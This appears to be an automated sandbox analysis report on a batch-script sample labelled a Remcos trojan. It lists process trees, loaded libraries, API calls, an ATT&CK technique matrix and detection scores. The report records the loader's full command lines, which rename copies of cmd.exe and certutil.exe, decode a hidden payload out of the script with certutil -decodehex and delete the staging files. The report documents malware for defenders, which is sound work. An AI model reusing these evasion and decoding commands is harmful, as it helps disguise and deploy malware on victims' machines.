Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\Public\kn.exe | Section loaded: certcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: cabinet.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptui.dll
Source: C:\Users\Public\kn.exe | Section loaded: ncrypt.dll
Source: C:\Users\Public\kn.exe | Section loaded: netapi32.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntdsapi.dll
Source: C:\Users\Public\kn.exe | Section loaded: version.dll
Source: C:\Users\Public\kn.exe | Section loaded: secur32.dll
Source: C:\Users\Public\kn.exe | Section loaded: certca.dll
Source: C:\Users\Public\kn.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\kn.exe | Section loaded: samcli.dll
Source: C:\Users\Public\kn.exe | Section loaded: logoncli.dll
Source: C:\Users\Public\kn.exe | Section loaded: dsrole.dll
Source: C:\Users\Public\kn.exe | Section loaded: netutils.dll
Source: C:\Users\Public\kn.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\kn.exe | Section loaded: ntasn1.dll
Source: C:\Users\Public\kn.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\kn.exe | Section loaded: profapi.dll
Source: Xirnkxhvuzwepe.cmd | Static file information: File size 3228698 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: alpha.exe.3.dr | Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.3.dr | Static PE information: section name: .didat
Source: kn.exe.5.dr | Static PE information: section name: .didat
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7C3668 push rsp; ret 7_2_00007FF7FD7C3669
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe

Boot Survival

Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\alpha.exe | API coverage: 7.9 %
Source: C:\Users\Public\alpha.exe | API coverage: 8.4 %
Source: C:\Users\Public\kn.exe | API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe | API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe | API coverage: 9.7 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8719F8 #359,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD7DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD81B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD80C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD87234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD85511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1963FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1893B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1893B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A53E0 SetUnhandledExceptionFilter
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1893B0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB1893B0 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD857024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8872B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD854E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1851EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB176EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB183140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB1851EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB176EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6EB183140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF7FD8A3800 LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB1851EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB176EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF6EB183140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB1851EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB176EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF6EB183140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB198654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF6EB198654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD88BEE8 LookupAccountNameW,GetLastError,GetLastError,#357,LocalAlloc,LocalAlloc,#357,LookupAccountNameW,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF7FD88BEE8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB17586C GetVersion,4_2_00007FF6EB17586C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF7FD7D5648
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF7FD7B54A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF7FD7CE568
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF7FD7B227C
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | Windows Management Instrumentation | 2 Valid Accounts | 2 Valid Accounts | 111 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 21 Access Token Manipulation | 2 Valid Accounts | LSASS Memory | 2 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 2 Disable or Modify Tools | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 21 Access Token Manipulation | NTDS | 1 System Owner/User Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 25 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Install Root Certificate | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1483432; Sample: Xirnkxhvuzwepe.cmd; Startdate: 27/07/2024; Architecture: WINDOWS; Score: 72)
  • Top-level signatures: Multi AV Scanner detection for submitted file; Sigma detected: Execution from Suspicious Folder; Sigma detected: Parent in Public Folder Suspicious Process
  • cmd.exe started extrac32.exe, alpha.exe (two instances) and 4 other processes
  • extrac32.exe dropped C:\Users\Public\alpha.exe (PE32+); signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
  • alpha.exe started kn.exe; the second alpha.exe started extrac32.exe; the other processes started a second kn.exe
  • extrac32.exe (started by alpha.exe) dropped C:\Users\Public\kn.exe (PE32+)
  • kn.exe: Registers a new ROOT certificate

Source | Detection | Scanner | Label | Link
Xirnkxhvuzwepe.cmd | 29% | ReversingLabs | Script-BAT.Trojan.Remcos |
Xirnkxhvuzwepe.cmd | 12% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
C:\Users\Public\alpha.exe | 0% | Virustotal | | Browse
